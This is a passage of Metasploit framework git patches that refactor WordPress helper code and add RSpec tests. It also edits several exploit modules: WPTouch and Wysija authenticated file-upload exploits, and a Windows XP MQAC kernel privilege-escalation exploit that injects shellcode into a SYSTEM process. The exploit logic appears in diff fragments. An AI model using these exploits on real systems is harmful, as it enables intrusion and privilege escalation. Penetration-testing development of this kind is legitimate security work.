+    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+    if handle['return'] == 0
+      print_error('Failed to open the \\.\MQAC device')
+      return nil
+    end
+    handle = handle['return']
+  end
+
+  def check
+    handle = open_device
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    os = sysinfo["OS"]
+    case os
+    when /windows xp.*service pack 3/i
+      return Exploit::CheckCode::Appears
+    when /windows xp/i
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
   def exploit
     if sysinfo["Architecture"] =~ /wow64/i
       print_error("Running against WOW64 is not supported")
@@ -115,12 +141,8 @@ class Metasploit3 < Msf::Exploit::Local
     base_addr = 0xffff
     print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
-    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
-    if handle['return'] == 0
-      print_error('Failed to open the \\.\MQAC device')
-      return
-    end
-    handle = handle['return']
+    handle = open_device
+    return if handle.nil?
 
     if not this_proc.memory.writable?(base_addr)
       result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")

From baff003eccdb0d60e775825b367fd7dc949a5a3d Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 22 Jul 2014 17:02:35 +0200
Subject: [PATCH 145/321] extracted check version to module

also added some wordpress specs and applied
rubocop
---
 lib/msf/http/wordpress.rb                     |  17 ++-
 lib/msf/http/wordpress/base.rb                |  35 +++--
 lib/msf/http/wordpress/login.rb               |  18 ++-
 lib/msf/http/wordpress/version.rb             |  82 +++++++++--
 .../unix/webapp/wp_wptouch_file_upload.rb     |  67 +++------
 .../webapp/wp_wysija_newsletters_upload.rb    |  28 +---
 spec/lib/msf/http/wordpress/base_spec.rb      |  57 ++++++++
 spec/lib/msf/http/wordpress/login_spec.rb     |  73 ++++++++++
 spec/lib/msf/http/wordpress/version_spec.rb   | 134 ++++++++++++++++++
 9 files changed, 404 insertions(+), 107 deletions(-)
 create mode 100644 spec/lib/msf/http/wordpress/base_spec.rb
 create mode 100644 spec/lib/msf/http/wordpress/login_spec.rb
 create mode 100644 spec/lib/msf/http/wordpress/version_spec.rb

diff --git a/lib/msf/http/wordpress.rb b/lib/msf/http/wordpress.rb
index d5cae88203..336b55c449 100644
--- a/lib/msf/http/wordpress.rb
+++ b/lib/msf/http/wordpress.rb
@@ -1,3 +1,4 @@
+# encoding: UTF-8
 # -*- coding: binary -*-
 
 # This module provides a way of interacting with wordpress installations
@@ -25,10 +26,20 @@ module Msf
         super
 
         register_options(
-            [
-                Msf::OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/']),
-            ], HTTP::Wordpress
+          [
+            Msf::OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/'])
+          ], HTTP::Wordpress
         )
+
+        register_advanced_options(
+          [
+            Msf::OptString.new('WPCONTENTDIR', [true, 'The name of the wp-content directory', 'wp-content'])
+          ], HTTP::Wordpress
+        )
+      end
+
+      def wp_content_dir
+        datastore['WPCONTENTDIR']
       end
     end
   end
diff --git a/lib/msf/http/wordpress/base.rb b/lib/msf/http/wordpress/base.rb
index 48cca67576..dd3d49fd72 100644
--- a/lib/msf/http/wordpress/base.rb
+++ b/lib/msf/http/wordpress/base.rb
@@ -1,28 +1,25 @@
+# encoding: UTF-8
 # -*- coding: binary -*-
 
 module Msf::HTTP::Wordpress::Base
-
   # Checks if the site is online and running wordpress
   #
   # @return [Rex::Proto::Http::Response,nil] Returns the HTTP response if the site is online and running wordpress, nil otherwise
   def wordpress_and_online?
-    begin
-      res = send_request_cgi({
-          'method' => 'GET',
-          'uri' => normalize_uri(target_uri.path)
-      })
-      return res if res and
-          res.code == 200 and
-          (
-            res.body =~ /["'][^"']*\/wp-content\/[^"']*["']/i or
-            res.body =~ /<link rel=["']wlwmanifest["'].*href=["'].*\/wp-includes\/wlwmanifest\.xml["'] \/>/i or
-            res.body =~ /<link rel=["']pingback["'].*href=["'].*\/xmlrpc\.php["'] \/>/i
-          )
-      return nil
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{peer} - Error connecting to #{target_uri}")
-      return nil
-    end
+    res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path)
+    )
+    return res if res &&
+        res.code == 200 &&
+        (
+          res.body =~ /["'][^"']*\/#{Regexp.escape(wp_content_dir)}\/[^"']*["']/i ||
+          res.body =~ /<link rel=["']wlwmanifest["'].*href=["'].*\/wp-includes\/wlwmanifest\.xml["'] \/>/i ||
+          res.body =~ /<link rel=["']pingback["'].*href=["'].*\/xmlrpc\.php["'](?: \/)*>/i
+        )
+    return nil
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    print_error("#{peer} - Error connecting to #{target_uri}")
+    return nil
   end
-
 end
diff --git a/lib/msf/http/wordpress/login.rb b/lib/msf/http/wordpress/login.rb
index 27ccff4f64..e4133fdf87 100644
--- a/lib/msf/http/wordpress/login.rb
+++ b/lib/msf/http/wordpress/login.rb
@@ -1,6 +1,7 @@
+# encoding: UTF-8
 # -*- coding: binary -*-
-module Msf::HTTP::Wordpress::Login
 
+module Msf::HTTP::Wordpress::Login
   # performs a wordpress login
   #
   # @param user [String] Username
@@ -8,21 +9,24 @@ module Msf::HTTP::Wordpress::Login
   # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
   def wordpress_login(user, pass)
     redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"
-    res = send_request_cgi({
+    res = send_request_cgi(
         'method' => 'POST',
         'uri' => wordpress_url_login,
         'vars_post' => wordpress_helper_login_post_data(user, pass, redirect)
-    })
+    )
 
-    if res and (res.code == 301 or res.code == 302) and res.headers['Location'] == redirect
+    if res && (res.code == 301 || res.code == 302) && res.headers['Location'] == redirect
       cookies = res.get_cookies
       # Check if a valid wordpress cookie is returned
-      return cookies if cookies =~ /wordpress(?:_sec)?_logged_in_[^=]+=[^;]+;/i ||
+      return cookies if
+        # current Wordpress
+        cookies =~ /wordpress(?:_sec)?_logged_in_[^=]+=[^;]+;/i ||
+        # Wordpress 2.0
         cookies =~ /wordpress(?:user|pass)_[^=]+=[^;]+;/i ||
+        # Wordpress 2.5
         cookies =~ /wordpress_[a-z0-9]+=[^;]+;/i
     end
 
-    return nil
+    nil
   end
-
 end
diff --git a/lib/msf/http/wordpress/version.rb b/lib/msf/http/wordpress/version.rb
index 0330d65fa3..193800f9dd 100644
--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -1,7 +1,7 @@
+# encoding: UTF-8
 # -*- coding: binary -*-
 
 module Msf::HTTP::Wordpress::Version
-
   # Extracts the Wordpress version information from various sources
   #
   # @return [String,nil] Wordpress version if found, nil otherwise
@@ -37,6 +37,28 @@ module Msf::HTTP::Wordpress::Version
     nil
   end
 
+  # Checks a readme for a vulnerable version
+  #
+  # @param [String] plugin_name The name of the plugin
+  # @param [String] fixed_version The version the vulnerability was fixed in
+  # @param [String] vuln_introduced_version Optional. The version the vulnerability was introduced.
+  #
+  # @return [ Msf::Exploit::CheckCode ]
+  def check_plugin_version_from_readme(plugin_name, fixed_version, vuln_introduced_version = nil)
+    check_version_from_readme(:plugin, plugin_name, fixed_version, vuln_introduced_version)
+  end
+
+  # Checks a readme for a vulnerable version
+  #
+  # @param [String] theme_name The name of the plugin
+  # @param [String] fixed_version The version the vulnerability was fixed in
+  # @param [String] vuln_introduced_version Optional. The version the vulnerability was introduced.
+  #
+  # @return [ Msf::Exploit::CheckCode ]
+  def check_theme_version_from_readme(theme_name, fixed_version, vuln_introduced_version = nil)
+    check_version_from_readme(:theme, theme_name, fixed_version, vuln_introduced_version)
+  end
+
   private
 
   # Used to check if the version is correct: must contain at least one dot.
@@ -47,18 +69,62 @@ module Msf::HTTP::Wordpress::Version
   end
 
   def wordpress_version_helper(url, regex)
-    res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => url
-    })
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => url
+    )
     if res
       match = res.body.match(regex)
-      if match
-        return match[1]
-      end
+      return match[1] if match
     end
 
     nil
   end
 
+  def check_version_from_readme(type, name, fixed_version, vuln_introduced_version = nil)
+    case type
+    when :plugin
+      folder = 'plugins'
+    when :theme
+      folder = 'themes'
+    else
+      fail("Unknown type #{type}")
+    end
+
+    readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, 'readme.txt')
+    res = send_request_cgi(
+      'uri'    => readme_url,
+      'method' => 'GET'
+    )
+    # no readme.txt present
+    return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+
+    # try to extract version from readme
+    # Example line:
+    # Stable tag: 2.6.6
+    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
+
+    # readme present, but no version number
+    return Msf::Exploit::CheckCode::Detected if version.nil?
+
+    vprint_status("#{peer} - Found version #{version} of the #{type}")
+
+    # Version older than fixed version
+    if Gem::Version.new(version) < Gem::Version.new(fixed_version)
+      if vuln_introduced_version.nil?
+        # All versions are vulnerable
+        return Msf::Exploit::CheckCode::Appears
+      # vuln_introduced_version provided, check if version is newer
+      elsif Gem::Version.new(version) >= Gem::Version.new(vuln_introduced_version)
+        return Msf::Exploit::CheckCode::Appears
+      else
+        # Not in range, nut vulnerable
+        return Msf::Exploit::CheckCode::Safe
+      end
+      return
+    # version newer than fixed version
+    else
+      return Msf::Exploit::CheckCode::Safe
+    end
+  end
 end
diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
index 864fd2bec7..bcd5c06c8c 100644
--- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb
@@ -1,3 +1,5 @@
+# encoding: UTF-8
+
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -12,7 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'Wordpress WPTouch Authenticated File Upload',
       'Description'    => %q{
           The Wordpress WPTouch plugin contains an auhtenticated file upload
@@ -33,19 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html' ]
+          ['URL', 'http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [ ['wptouch < 3.4.3', {}] ],
+      'Targets'        => [['wptouch < 3.4.3', {}]],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 14 2014'))
 
     register_options(
       [
-        OptString.new('USER', [true, "A valid username", nil]),
-        OptString.new('PASSWORD', [true, "Valid password for the provided username", nil]),
+        OptString.new('USER', [true, 'A valid username', nil]),
+        OptString.new('PASSWORD', [true, 'Valid password for the provided username', nil])
       ], self.class)
   end
 
@@ -58,55 +61,29 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wptouch', 'readme.txt')
-    res = send_request_cgi({
-      'uri'    => readme_url,
-      'method' => 'GET'
-    })
-    # no readme.txt present
-    if res.nil? || res.code != 200
-      return Msf::Exploit::CheckCode::Unknown
-    end
-
-    # try to extract version from readme
-    # Example line:
-    # Stable tag: 2.6.6
-    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
-
-    # readme present, but no version number
-    if version.nil?
-      return Msf::Exploit::CheckCode::Detected
-    end
-
-    vprint_status("#{peer} - Found version #{version} of the plugin")
-
-    if Gem::Version.new(version) < Gem::Version.new('3.4.3')
-      return Msf::Exploit::CheckCode::Appears
-    else
-      return Msf::Exploit::CheckCode::Safe
-    end
+    check_plugin_version_from_readme('wptouch', '3.4.3')
   end
 
   def get_nonce(cookie)
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'    => wordpress_url_backend,
       'method' => 'GET',
       'cookie' => cookie
-    })
+    )
 
     # forward to profile.php or other page?
-    if res and res.code.to_s =~ /30[0-9]/ and res.headers['Location']
+    if res && res.code.to_s =~ /30[0-9]/ && res.headers['Location']
       location = res.headers['Location']
       print_status("#{peer} - Following redirect to #{location}")
-      res = send_request_cgi({
+      res = send_request_cgi(
         'uri'    => location,
         'method' => 'GET',
         'cookie' => cookie
-      })
+      )
     end
 
-    if res and res.body and res.body =~ /var WPtouchCustom = {[^}]+"admin_nonce":"([a-z0-9]+)"};/
-      return $1
+    if res && res.body && res.body =~ /var WPtouchCustom = {[^}]+"admin_nonce":"([a-z0-9]+)"};/
+      return Regexp.last_match[1]
     else
       return nil
     end
@@ -124,20 +101,20 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload")
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method'   => 'POST',
       'uri'      => wordpress_url_admin_ajax,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'data'     => post_data,
       'cookie'   => cookie
-    })
+    )
 
-    if res and res.code == 200 and res.body and res.body.length > 0
+    if res && res.code == 200 && res.body && res.body.length > 0
       register_files_for_cleanup(filename)
       return res.body
     end
 
-    return nil
+    nil
   end
 
   def exploit
@@ -164,9 +141,9 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{peer} - Calling uploaded file #{file_path}")
-    res = send_request_cgi({
+    send_request_cgi(
       'uri'    => file_path,
       'method' => 'GET'
-    })
+    )
   end
 end
diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
index 2e60a9ec51..9f4742fd5a 100644
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -70,29 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
-    res = send_request_cgi(
-      'uri'    => readme_url,
-      'method' => 'GET'
-    )
-    # no readme.txt present
-    return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
-
-    # try to extract version from readme
-    # Example line:
-    # Stable tag: 2.6.6
-    version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
-
-    # readme present, but no version number
-    return Msf::Exploit::CheckCode::Detected if version.nil?
-
-    vprint_status("#{peer} - Found version #{version} of the plugin")
-
-    if Gem::Version.new(version) < Gem::Version.new('2.6.8')
-      return Msf::Exploit::CheckCode::Appears
-    else
-      return Msf::Exploit::CheckCode::Safe
-    end
+    check_plugin_version_from_readme('wysija-newsletters', '2.6.8')
   end
 
   def exploit
@@ -101,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     zip_content = create_zip_file(theme_name, payload_name)
 
-    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')
+    uri = normalize_uri(wordpress_url_backend, 'admin-post.php')
 
     data = Rex::MIME::Message.new
     data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
@@ -112,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
     data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
     post_data = data.to_s
 
-    payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
+    payload_uri = normalize_uri(target_uri.path, wp_content_dir, 'uploads', 'wysija', 'themes', theme_name, payload_name)
 
     print_status("#{peer} - Uploading payload to #{payload_uri}")
     res = send_request_cgi(
diff --git a/spec/lib/msf/http/wordpress/base_spec.rb b/spec/lib/msf/http/wordpress/base_spec.rb
new file mode 100644
index 0000000000..596042370e
--- /dev/null
+++ b/spec/lib/msf/http/wordpress/base_spec.rb
@@ -0,0 +1,57 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/core/exploit'
+require 'rex/proto/http/response'
+require 'msf/http/wordpress'
+
+describe Msf::HTTP::Wordpress::Base do
+  subject do
+    mod = ::Msf::Exploit.new
+    mod.extend ::Msf::HTTP::Wordpress
+    mod.send(:initialize)
+    mod
+  end
+
+  describe '#wordpress_and_online?' do
+    before :each do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.code = wp_code
+        res.body = wp_body
+        res
+      end
+    end
+
+    let(:wp_code) { 200 }
+
+    context 'when wp-content in body' do
+      let(:wp_body) { '<a href="http://domain.com/wp-content/themes/a/style.css">' }
+      it { expect(subject.wordpress_and_online?).to be_kind_of Rex::Proto::Http::Response }
+    end
+
+    context 'when wlwmanifest in body' do
+      let(:wp_body) { '<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://domain.com/wp-includes/wlwmanifest.xml" />' }
+      it { expect(subject.wordpress_and_online?).to be_kind_of Rex::Proto::Http::Response }
+    end
+
+    context 'when pingback in body' do
+      let(:wp_body) { '<link rel="pingback" href="https://domain.com/xmlrpc.php" />' }
+      it { expect(subject.wordpress_and_online?).to be_kind_of Rex::Proto::Http::Response }
+    end
+
+    context 'when status code != 200' do
+      let(:wp_body) { nil }
+      let(:wp_code) { 404 }
+      it { expect(subject.wordpress_and_online?).to be_nil }
+    end
+
+    context 'when no match in body' do
+      let(:wp_body) { 'Invalid body' }
+      it { expect(subject.wordpress_and_online?).to be_nil }
+    end
+
+  end
+
+end
diff --git a/spec/lib/msf/http/wordpress/login_spec.rb b/spec/lib/msf/http/wordpress/login_spec.rb
new file mode 100644
index 0000000000..6b726fa710
--- /dev/null
+++ b/spec/lib/msf/http/wordpress/login_spec.rb
@@ -0,0 +1,73 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/core/exploit'
+require 'rex/proto/http/response'
+require 'msf/http/wordpress'
+
+describe Msf::HTTP::Wordpress::Login do
+  subject do
+    mod = ::Msf::Exploit.new
+    mod.extend ::Msf::HTTP::Wordpress
+    mod.send(:initialize)
+    mod
+  end
+
+  describe '#wordpress_login' do
+    before :each do
+      allow(subject).to receive(:send_request_cgi) do |opts|
+        res = Rex::Proto::Http::Response.new
+        res.code = 301
+        if wp_redirect
+          res['Location'] = wp_redirect
+        else
+          res['Location'] = opts['vars_post']['redirect_to']
+        end
+        res['Set-Cookie'] = wp_cookie
+        res.body = 'My Homepage'
+        res
+      end
+    end
+
+    let(:wp_redirect) { nil }
+
+    context 'when current Wordpress' do
+      let(:wp_cookie) { 'wordpress_logged_in_1234=1234;' }
+      it { expect(subject.wordpress_login('user', 'pass')).to eq(wp_cookie) }
+    end
+
+    context 'when current Wordpress sec cookie' do
+      let(:wp_cookie) { 'wordpress_sec_logged_in_1234=1234;' }
+      it { expect(subject.wordpress_login('user', 'pass')).to eq(wp_cookie) }
+    end
+
+    context 'when Wordpress 2.5' do
+      let(:wp_cookie) { 'wordpress_asdf=1234;' }
+      it { expect(subject.wordpress_login('user', 'pass')).to eq(wp_cookie) }
+    end
+
+    context 'when Wordpress 2.0 user cookie' do
+      let(:wp_cookie) { 'wordpressuser_1234=1234;' }
+      it { expect(subject.wordpress_login('user', 'pass')).to eq(wp_cookie) }
+    end
+
+    context 'when Wordpress 2.0 pass cookie' do
+      let(:wp_cookie) { 'wordpresspass_1234=1234;' }
+      it { expect(subject.wordpress_login('user', 'pass')).to eq(wp_cookie) }
+    end
+
+    context 'when invalid login' do
+      let(:wp_cookie) { 'invalid=cookie;' }
+      it { expect(subject.wordpress_login('invalid', 'login')).to be_nil }
+    end
+
+    context 'when invalid redirect' do
+      let(:wp_cookie) { 'invalid=cookie;' }
+      let(:wp_redirect) { '/invalid/redirect' }
+      it { expect(subject.wordpress_login('invalid', 'login')).to be_nil }
+    end
+
+  end
+
+end
diff --git a/spec/lib/msf/http/wordpress/version_spec.rb b/spec/lib/msf/http/wordpress/version_spec.rb
new file mode 100644
index 0000000000..b5a2a4190a
--- /dev/null
+++ b/spec/lib/msf/http/wordpress/version_spec.rb
@@ -0,0 +1,134 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/core/exploit'
+require 'rex/proto/http/response'
+require 'msf/http/wordpress'
+
+describe Msf::HTTP::Wordpress::Version do
+  subject do
+    mod = ::Msf::Exploit.new
+    mod.extend ::Msf::HTTP::Wordpress
+    mod.send(:initialize)
+    mod
+  end
+
+  describe '#wordpress_version' do
+    before :each do
+      allow(subject).to receive(:send_request_cgi) do |opts|
+        res = Rex::Proto::Http::Response.new
+        res.code = 200
+        res.body = wp_body
+        res
+      end
+    end
+
+    let(:wp_version) {
+      r = Random.new
+      "#{r.rand(10)}.#{r.rand(10)}.#{r.rand(10)}"
+    }
+
+    context 'when version from generator' do
+      let(:wp_body) { '<meta name="generator" content="WordPress ' << wp_version << '" />' }
+      it { expect(subject.wordpress_version).to eq(wp_version) }
+    end
+
+    context 'when version from readme' do
+      let(:wp_body) { " <br /> Version #{wp_version}" }
+      it { expect(subject.wordpress_version).to eq(wp_version) }
+    end
+
+    context 'when version from rss' do
+      let(:wp_body) { "<generator>http://wordpress.org/?v=#{wp_version}</generator>" }
+      it { expect(subject.wordpress_version).to eq(wp_version) }
+    end
+
+    context 'when version from rdf' do
+      let(:wp_body) { '<admin:generatorAgent rdf:resource="http://wordpress.org/?v=' << wp_version << '" />' }
+      it { expect(subject.wordpress_version).to eq(wp_version) }
+    end
+
+    context 'when version from atom' do
+      let(:wp_body) { '<generator uri="http://wordpress.org/" version="' << wp_version << '">WordPress</generator>' }
+      it { expect(subject.wordpress_version).to eq(wp_version) }
+    end
+
+    context 'when version from sitemap' do
+      let(:wp_body) { '<!--  generator="WordPress/' << wp_version << '"  -->' }
+      it { expect(subject.wordpress_version).to eq(wp_version) }
+    end
+
+    context 'when version from opml' do
+      let(:wp_body) { '<!--  generator="WordPress/' << wp_version << '"  -->' }
+      it { expect(subject.wordpress_version).to eq(wp_version) }
+    end
+
+  end
+
+  describe '#check_version_from_readme' do
+    before :each do
+      allow(subject).to receive(:send_request_cgi) do |opts|
+        res = Rex::Proto::Http::Response.new
+        res.code = wp_code
+        res.body = wp_body
+        res
+      end
+    end
+
+    let(:wp_code) { 200 }
+    let(:wp_body) { nil }
+    let(:wp_fixed_version) { nil }
+
+    context 'when no readme is found' do
+      let(:wp_code) { 404 }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Unknown) }
+    end
+
+    context 'when no version can be extracted from readme' do
+      let(:wp_code) { 200 }
+      let(:wp_body) { 'invalid content' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Detected) }
+    end
+
+    context 'when installed version is vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'stable tag: 1.0.0' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is not vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'stable tag: 1.0.2' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is vulnerable (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.2' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'stable tag: 1.0.1' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is older (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'stable tag: 0.0.9' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is newer (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'stable tag: 1.0.2' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+  end
+
+end

From 12904edf831150eb742b55f51757d8749ceb7289 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 22 Jul 2014 11:20:07 -0400
Subject: [PATCH 146/321] Remove unnecessary target info and add url reference

---
 modules/exploits/windows/local/mqac_write.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index c73b9ede1d..31e3b16b61 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -38,8 +38,6 @@ class Metasploit3 < Msf::Exploit::Local
         [
           [ 'Windows XP SP3',
             {
-              'HaliQuerySystemInfo' => 0x16bba,
-              'HalpSetSystemInformation' => 0x19436,
               '_KPROCESS' => "\x44",
               '_TOKEN' => "\xc8",
               '_UPID' => "\x84",
@@ -51,6 +49,7 @@ class Metasploit3 < Msf::Exploit::Local
         [
           [ 'CVE', '2014-4971' ],
           [ 'EDB', '34112' ],
+          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
         ],
       'DisclosureDate'=> 'Jul 22 2014',
       'DefaultTarget' => 0
@@ -98,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Local
   def open_device
     handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
     if handle['return'] == 0
-      print_error('Failed to open the \\.\MQAC device')
+      print_error('Failed to open the \\\\.\\MQAC device')
       return nil
     end
     handle = handle['return']

From 5d9c6bea9d259b6a5fb16d0f8fc6827ef6e260dd Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 22 Jul 2014 13:06:57 -0400
Subject: [PATCH 147/321] Fix a typo and use the execute_shellcode function

---
 modules/exploits/windows/local/mqac_write.rb  | 19 ++++++-------------
 .../windows/local/ms11_080_afdjoinleaf.rb     |  2 +-
 2 files changed, 7 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 31e3b16b61..6a7fefdf3c 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
   include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
 
   def initialize(info={})
     super(update_info(info, {
@@ -125,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Local
     if sysinfo["Architecture"] =~ /wow64/i
       print_error("Running against WOW64 is not supported")
       return
-    elsif sysinfo["Architectore"] =~ /x64/
+    elsif sysinfo["Architecture"] =~ /x64/
       print_error("Running against 64-bit systems is not supported")
       return
     end
@@ -191,18 +192,10 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    begin
-      proc = get_system_proc
-      print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}")
-      host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS)
-      mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024))
-
-      print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}")
-      host_process.memory.write(mem, payload.encoded)
-      host_process.thread.create(mem, 0)
-    rescue ::Exception => e
-      print_error("Failed to Inject Payload")
-      print_error(e.to_s)
+    proc = get_system_proc
+    print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
+    unless execute_shellcode(payload.encoded, nil, proc['pid'])
+      fail_with(Failure::Unknown, "Error while executing the payload")
     end
   end
 
diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
index 747861ed60..8a24a7a9d8 100644
--- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
+++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Local
     if sysinfo["Architecture"] =~ /wow64/i
       print_error("Running against WOW64 is not supported")
       return
-    elsif sysinfo["Architectore"] =~ /x64/
